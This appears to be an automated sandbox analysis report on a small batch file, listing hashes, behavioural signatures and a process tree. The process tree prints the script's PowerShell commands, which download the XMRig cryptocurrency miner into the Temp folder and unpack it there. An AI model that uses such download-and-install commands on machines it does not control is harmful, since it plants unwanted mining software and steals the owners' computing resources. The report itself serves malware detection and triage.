Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-12-2024 15:07
Behavioral task
behavioral1
Sample
s.bat
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
s.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
s.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
s.bat
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral5
Sample
s.bat
Resource
win11-20241007-en
General
-
Target
s.bat
-
Size
1KB
-
MD5
1e64009a55d5a9eb64fd903f621e5ae0
-
SHA1
0e5de7ecc2363d16ac2ae8f244d895cff70d6cdb
-
SHA256
c5845905301cb177cd5ba386ab909a43ed5263ddbbc470ab0da8ef8c8bc82abf
-
SHA512
2b28221714861951beeb73247a7ab58f4e68d3510e030d25787a13c6c715cea2b82d51cb1f262736dde8738e9ceb59420b4d4dc724524ece75a6a13978da8695
Malware Config
Signatures
-
pid Process 3068 powershell.exe 2644 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2612 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3068 powershell.exe 2644 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2884 wrote to memory of 3068 2884 cmd.exe 31 PID 2884 wrote to memory of 3068 2884 cmd.exe 31 PID 2884 wrote to memory of 3068 2884 cmd.exe 31 PID 2884 wrote to memory of 2612 2884 cmd.exe 32 PID 2884 wrote to memory of 2612 2884 cmd.exe 32 PID 2884 wrote to memory of 2612 2884 cmd.exe 32 PID 2884 wrote to memory of 2644 2884 cmd.exe 33 PID 2884 wrote to memory of 2644 2884 cmd.exe 33 PID 2884 wrote to memory of 2644 2884 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\system32\timeout.exetimeout /t 102⤵
- Delays execution with timeout.exe
PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ad5279340f0672b4e9e11c7e95244a78
SHA1559916126c2d3310a9d58b870de0b43451a843ae
SHA256aa35e660ed6423da453ad46f647a4c5b646904f9c239743d953051d5c20be4b2
SHA5127e97bcff9f3fec9521fa6d1d23e716555e1fa8f65724b3745f3871eb993a72f2da7818da40cde56200e978d6be27e1960fc9d2b4578864e99c84be3881adf878